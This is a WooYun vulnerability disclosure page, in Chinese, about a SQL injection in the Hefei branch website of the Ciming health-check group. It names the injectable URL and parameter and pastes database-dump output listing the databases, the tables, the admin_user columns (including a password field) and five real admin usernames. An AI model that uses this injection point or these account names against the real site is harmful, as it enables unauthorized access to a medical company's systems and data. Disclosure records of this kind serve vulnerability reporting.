乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-28: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-10-12: 厂商已经主动忽略漏洞,细节向公众公开
慈铭体检集团之合肥站注射
注射点:
http://www.hefeiciming.com/tjsb_list.php?cat_pid=33&cat_id=34
脱出数据
available databases [2]:[*] information_schema[*] sqlhefeicimingDatabase: sqlhefeiciming[28 tables]+------------------+| user || admin_mod || admin_user || admin_useroption || art_dis_config || article || category || cnt || color_code || comes || company_email || control_sys || cr_columninfo || doc_useroption || docuser || edit_type || info_set || information || iplist || message || order_goods || order_product || set_value || shopproduct || shopuser || shu || survey || urls |+------------------+Database: sqlhefeicimingTable: admin_user[6 columns]+----------+-------------+| Column | Type |+----------+-------------+| date | datetime || id | int(11) || realname | varchar(40) || username | varchar(64) || userpswd | varchar(64) || usertype | varchar(20) |+----------+-------------+Database: sqlhefeicimingTable: admin_user[5 entries]+-----------+| username |+-----------+| admin || cm_admin || seo123 || web_admin || wj_admin! |+-----------+
密码
综上
你们懂
未能联系到厂商或者厂商积极拒绝